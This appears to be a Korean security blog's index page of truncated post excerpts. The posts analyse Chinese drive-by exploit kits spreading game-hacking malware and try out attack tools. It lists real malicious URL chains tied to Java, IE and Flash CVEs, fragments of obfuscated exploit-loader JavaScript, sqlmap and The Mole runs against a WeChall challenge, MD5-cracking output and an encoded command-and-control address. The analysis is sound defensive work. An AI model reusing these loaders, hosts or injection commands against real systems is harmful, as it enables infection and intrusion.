[카테고리:] Security

JSXX 0.44 VIP

최근 경향은 대부분 자바 취약점이네요. 간단하게 한번 디코딩 하여 살펴보았습니다. http://5b8.co/m L http://5b8.co/m/index.html L http://5b8.co/m/swfobject.js L http://5b8.co/m/jpg.js L http://5b8.co/m/jvTDIYE7.html L http://5b8.co/m/GAHNr0.html 원본 코드는 아래와 같습니다. <script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script type="text/javascript"> var YdgJw3=navigator.userAgent.toLowerCase(); var SPRB3="1"+"1"+"1"; if(document.cookie.indexOf("xcDHL4=")==-1 && YdgJw3.indexOf("linux")<=-1 && YdgJw3.indexOf("bot")==-1 && YdgJw3.indexOf("spider")==-1) { var pxtXtt1=deconcept.SWFObjectUtil.getPlayerVersion(); var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); SPRB3="0"; document.cookie="xcDHL4=Yes;path=/;expires="+expires.toGMTString(); FTYdkdd0="1";delete FTYdkdd0;try{FTYdkdd0+="0"+"0"+"0"+"0"+"0"+"0"+"0"+"0";}catch(e){var Huaqmm1="1";XtpkDF6 …

Yszz 1.5 vip 관련 코드 확인

오랜만에 보여서 한번 살펴봤는데 예전과 많이 달라져서 기록해 둔다. http://festival.cocobau.com/adm_site/e_show/e_th_ad.js L http://205.164.25.148/pic/img.js L http://205.164.25.148/pic/img.html L http://205.164.25.148/pic/XLL0zxmA.jpg (CVE?) L http://205.164.25.148/pic/rKQeVOG.jpg (CVE-2011-3544) L http://205.164.25.148/pic/9O4v7e.html (CVE-2011-1255) L http://205.164.25.148/pic/yNDGhP.js L http://205.164.25.148/pic/bmrYt.html (CVE-2012-1889) L http://205.164.25.148/pic/swfobject.js L http://205.164.25.148/pic/jpg.js L http://205.164.25.148/pic/css.html img.html 파일을 디코딩 해보도록 하자. "Yszz 1.5 vip" 라는 주석이 들어가는게 특징으로 보인다. <script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script language =javascript> …

sqlmap – automatic SQL injection and database takeover tool

sqlmap 이란 툴이 트위터랑 페이스북에서 계속 언급되어 어떤것인가 하고 찾아서 사용해 봤습니다. 이것도 굉장한 자동화 도구네요. 아래는 간단하게 테스트 한 내용 입니다. sqlmap : http://sqlmap.sourceforge.net/ 메뉴얼 : http://sqlmap.sourceforge.net/doc/README.html GUI for sqlmap (Linux) : http://code.google.com/p/gui-for-sqlmap/ GUI for sqlmap (Windows) : http://sourceforge.net/projects/sqlmapwin/ 1. Database명 알아내기 [byjjoon@localhost sqlmap]$ ./sqlmap.py -u "http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login" –dbs sqlmap/0.9 – automatic SQL injection and …

또 추가된 온라인게임핵 악성코드 전파용 취약점 (CVE-2012-0754)

국내에서 전파되는 온라인게임핵 악성코드 전파용 취약점이 또 하나가 새롭게 추가가 되었습니다. CVE-2012-0754 : http://www.exploit-db.com/exploits/18572/ Exploit-DB 사이트에 올라오자 마자 바로 자기네들에 맞게 수정하여 전파하네요. 아래는 이번에 국내에서 발견된 해당 취약점과 관련된 SWF 파일 내부에 작성되어 있는 액션 스크립트 입니다. 이전에 발견된 CVE-2011-2140 취약점과 아주 유사하게 구성되어 있으며 취약점과 관련된 MP4 파일명도 CVE-2011-2140 취약점은 ea.jpg 그리고 이번에 …

새로운 난독화 해제 방법 (Encrypt By Dadong’s JSXX 0.41 VIP)

Encrypt By Dadong blahblah 라고 주석을 남기던 난독화 코드가 버전업을 했습니다. 이제는 아래와 같은 주석을 남기네요. Encrypt By www.krmeok.com's JSXX 0.41 VIP Encrypt By 도메인명's JSXX 0.41 VIP 아마도 "Encrypt By Dadong" 이라는 문자열로 시그니처를 만들기 시작해서 그것을 회피하고자 바꾼 것으로 추측됩니다. 추가로 디코딩 방법은 0.41로 버전업 하기 전과 동일한 방법으로 풀리며, 디코딩 하는 새로운 …

BozoCrack – MD5 Crack

MD5 Hash를 꺠는데 구글을 이용하여 레인보우 테이블이나 브루트포스 공격보다 더 빠르게 찾을 수 있는 BozoCrack 이란게 있다고 하여 간단하게 테스트를 해보았습니다. [root@localhost byjjoon]# cat test.txt 098f6bcd4621d373cade4e832627b4f6 755f85c2723bb39381c7379a604160d8 f6182f0359f72aae12fb90d305ccf9eb eb938c5aa46863c29e86c64a2c2ed60c [root@localhost byjjoon]# ruby bozocrack.rb Usage example: ruby bozocrack.rb file_with_md5_hashes.txt [root@localhost byjjoon]# ruby bozocrack.rb test.txt Loaded 4 unique hashes 098f6bcd4621d373cade4e832627b4f6:test 755f85c2723bb39381c7379a604160d8:good f6182f0359f72aae12fb90d305ccf9eb:young eb938c5aa46863c29e86c64a2c2ed60c:pyj 꽤 빠르게 뽑아주네요 다운로드는 …

The Mole

SQL Injection 관련 툴이 있어 간단한 사용기를 작성합니다. The Mole (Digging up your data) : http://themole.nasel.com.ar/ 문제는 WeChall의 Table 이름을 찾는 문제를 대상으로 해당 툴을 이용해 풀이를 해보도록 하겠습니다. 실행 후 Tab 키를 누르면 여러 옵션을 설정할 수 있음을 알 수 있습니다. 옵션이 다양해서 아주 범용적으로 사용할 수 있을거 같네요. C:\Users\ByJJoon\Downloads\themole-0.2.6>mole.exe _____ _ ___ ___ …

새롭게 추가된 온라인게임핵 악성코드 전파용 취약점 (CVE-2011-3544)

최근 국내에서 전파되는 온라인게임핵 악성코드와 관련하여 추가된 취약점이 있어 공유합니다. http://www.yo****ow.com/63/pps.html L http://www.yo****ow.com/63/jpg.js 이번주부터 추가되어 전파되는 것으로 보이며, CVE-2011-3544 (Oracle Java Applet Rhino Script Engine Remote Code Execution) 취약점으로 Oracle Java SE JDK and JRE 7 and 6 Update 27 이전 버전이면 감염이 됩니다. http://www.yo****ow.com/63/pps.html 코드를 살펴보면 이전과는 다른점을 확인할 수 있습니다. <script src=jpg.js></script> <script> …

새로운 URL 암호화 방법

최근 악성코드 중 아래와 같은 페이지에 접속하여 특정 명령을 받아 실행하는 악성코드를 확인하였습니다. hxxp://211.255.23.46/counter/update.txt 위 주소에 접속하면 아래와 같이 숫자만 나타나게 됩니다. 049058104116116112058047047049050049046050053052046049054053046049048053047105099111110115047107114046101120101 관련 악성코드를 분석해본 결과 예전에는 단순히 주소 혹은 XOR로 암호화 하였으나 이번엔 좀 새로운 패턴으로 한것을 확인하였습니다. 복호화는 아래 페이지에서 가능하도록 기능을 추가 하였습니다. http://119.194.217.188:8080/Honeypot/ ‘new’ 텍스트 박에서 해당 값을 입력하면 아래와 …